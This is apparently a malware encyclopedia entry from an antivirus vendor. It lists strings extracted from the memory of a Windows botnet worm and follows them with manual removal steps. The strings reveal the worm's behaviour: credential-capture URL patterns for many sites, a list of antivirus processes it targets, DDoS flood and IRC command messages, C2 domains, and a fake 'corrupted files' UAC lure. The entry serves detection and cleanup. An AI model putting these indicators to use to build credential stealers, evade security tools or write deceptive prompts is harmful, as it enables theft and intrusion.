l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

Explorer.EXE_1988_rwx_01DB0000_00001000:

b.kebdbrentdq.com
ws2_32.dll
advapi32.dll

Explorer.EXE_1988_rwx_01E00000_00027000:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV

Explorer.EXE_1988_rwx_01E28000_0006B000:

Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
<Port>
<Pass>
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
hXXp://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
hXXp://%s%s/image.php?id=%s
TaskDialogIndirect
hXXp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
9%9 919<9
=(=/=6==={=
4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter passed to C runtime function.
GetProcessWindowStation
USER32.DLL
RegSetKeySecurity
RegEnumKeyA
ADVAPI32.dll
GDI32.dll
GetNamedPipeHandleStateA
CreateIoCompletionPort
DisconnectNamedPipe
GetNamedPipeInfo
PeekNamedPipe
GetProcessHeap
SetProcessShutdownParameters
GetCPInfo
KERNEL32.dll
.EGDF
-TQ}9J3
l.Bt.,
Y%U(q
>.Rm4xon}V^
jdB .toN@&
#)CM%D
qu.kP
{-Qn}-
 %Fj 7
o!L.Zy
.mvry
Ryx.ps
n}.cK
{ww%f
%c;sk
h%S4m
.FdT=
Software\Classes\CLSID\%S
G:%S_0xX
chrome.exe
opera.exe
safari.exe
maxthon.exe
:Mozilla\Firefox\Profiles
cookies.sqlite
%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
%s\winsxs\%s\comctl32.dll
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
%s:*:Enabled
avcuf32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
prstrui.exe
Windows Defender
MpClient.dll
Windows Defender\MSASCui.exe
MpSvc.dll
msseces.exe
MsMpEng.exe
MSASCui.exe
MpAsDesc.dll
MsMpLics.dll
avgui.exe
avgidsagent.exe
avgwdsvc.exe
avgdiagex.exe
avgmfapx.exe
avgupd.exe
avgcfgex.exe
avgnt.exe
avguard.exe
avshadow.exe
avcenter.exe
update.dll
updaterc.dll
usrreq.exe
ccsvchst.exe
symerr.exe
NIS.exe
NAV.exe
navw32.exe
avastui.exe
AvastEmUpdate.exe
ashUpd.exe
WRSA.exe
zatray.exe
ForceField.exe
updating.dll
fshoster32.exe
fsaua.dll
PSUNMain.exe
PSUAService.exe
PSANHost.exe
PSUNScan.dll
epavjobs.exe
AVENGINE.exe
Upgrader.exe
adaware.exe
BullGuard.exe.manifest
BullGuardUpdate.exe
BullGuard.exe
BullGuardScanner.exe
BullGuardBhvScanner.exe
BullGuardUpdate2.exe
BgScan.exe
BgScanEngine.dll
.manifest
updater.exe
Backup\RSD\RSSetup\updater.exe
RsTray.exe
RavMonD.exe
RsMgrSvc.exe
rsmain.exe
RsScan.dll
RsTray.dll
mbamgui.exe
mbam.exe
pctsGui.exe
pctsAuxs.exe
pctsSvc.exe
Update.exe
UpdateHlpr.dll
Definitions\vcore.dll
sbamui.exe
SBAMTray.exe
updater_client_mod.dll
FProtTray.exe
FPWin.exe
scf.dat
ALUpdate.exe
update_tmp.exe
arcaclean.exe
BavUpdater.exe
rcfp.exe
CLPSLA.exe
op_mon.exe
niu.exe
K7TSUpdT.exe
sguardxup.exe
ccupdate.exe
caupdate.dll
a2guard.exe
a2start.exe
a2service.exe
AVKTray.exe
GDSC.exe
AVK.exe
GDFirewallTray.exe
Bka.exe
BLuPro.exe
BkavSystemServer.exe
BkavService.exe
LiveUpdate.dll
LiveConnect.dll
BaseFile\Bkav\LiveUpdate.dll
V3Lite.exe
ASDSvc.exe
autoup.exe
downloader.exe
%s.config
updatesrv.exe
updatemgr.dll
egui.exe
ekrn.exe
x86\ekrn.exe
uWinMgr.exe
coreServiceShell.exe
uiSeAgnt.exe
uiWatchDog.exe
plugins\plugUpdater.dll
UiFrmwrk\uiUpdateTray.exe
coreFrameworkHost.exe
mcagent.exe
McSvHost.exe
McUICnt.exe
McPvTray.exe
mcui_exe
mcpltui_exe
mcshell.exe
mcupdmgr.exe
mcupdate.exe
mcshield.exe
mcupdui.dll
McAPExe.exe
.config
Image File Execution Options\%s
SYSTEM\CurrentControlSet\services\%s
%c:\ntusbdriver.sys
%c:\*p.exe
%c:\%s
p.exe
%WinDir%\explorer.exe
/C start /d. %s&"%s"
%COMSPEC%
%WinDir%\system32\shell32.dll
%c:\%s.lnk
VisthAux.exe
explorer.exe
t.minecraft
Works! PID: %d, Name: %s
cmdvirth
%s%s\X
tcp://
svchost.exe
csrss.exe
lsass.exe
smss.exe
wscript.exe
cscript.exe
vbc.exe
rundll32.exe
regsvr32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
winlogon.exe
services.exe
%s\x.lnk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
desktop.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
wintrust.dll
chrome.dll
Applications\iexplore.exe\shell\open\command
%s_xx
x.zip
Navw32.exe
SysInspector.exe
avscan.exe
mfefire.exe
wuauclt.exe
WerFault.exe
lFileZilla\sitemanager.xml
port
Sites.dat
Quick.dat
%s\3\%s
%s\4\%s
spoolsv.exe
steam.exe
skype.exe
origin.exe
dwm.exe
tapi3.dll
/C copy "%s" "%s"
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Update Service
"%s" /%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST
schtasks.exe
/DELETE /TN "Windows Update Check - 0xX" /F
\Windows\Explorer.exe
Low_X
%s.manifest
PendingFileRenameOperations
%s\X
Windows\CurrentVersion\Run
CurrentVersion\Windows
Windows NT\CurrentVersion\Image File Execution Options\%s
Windows has encountered a corrupted folder on your hard drive
Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.
Corrupted folder: %s
Corrupted file count: %d
<a href=".ms">%s</a>
/c start "" "%s" /%s "%s"
shell32,ShellExec_RunDLL "%s" /%s "%s"
You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.
Windows 3.1 Update Service
%s:Zone.Identifier
%s\X.pif
KERNEL32.DLL
KERNELBASE.DLL
ekernel32.dll
kernelbase.dll
Website Copier [Offline Browser]
WinHTTrack Website Copier, Copy Websites to Your Computer
3.47.21
WinHTTrack.exe
WinHTTrack Website Copier

Explorer.EXE_1988_rwx_01EC0000_00002000:

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe

Explorer.EXE_1988_rwx_01FE0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%WinDir%\Explorer.EXE
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

Explorer.EXE_1988_rwx_020F0000_00001000:

dq.kebdbrentdq.com
ws2_32.dll
advapi32.dll

Explorer.EXE_1988_rwx_02110000_00002000:

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:192
    kusadtylds.exe:1512
    hsadjku.exe:1524
    hsadjku.exe:1376
    yhtdayrg.exe:1120
    yhtdayrg.exe:1800
    dw3re.exe:3560
    dw3re.exe:3308
    ksaduytr.exe:1096
    ksaduytr.exe:1664
    ksaduytr.exe:764

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (33007 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\bet[1].exe (46913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (39323 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dw3re.exe (2738 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hsadjku.exe (16668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\zpm[1].exe (19865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (6366 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bnew[1].exe (20855 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\dqnew[1].exe (13561 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\ng[1].exe (37249 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@wipmania[1].txt (171 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bnfjdaocr[1].htm (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
    C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\Desktop.ini (63 bytes)
    C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe (673 bytes)
    %Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
    C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe (673 bytes)
    C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\Desktop.ini (63 bytes)
    %Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dha38b2" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dha8b2" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe"

  6. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4115614\h7a3b6a.exe,explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-4133614\h73a3b6a.exe"

  7. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  8. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  9. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now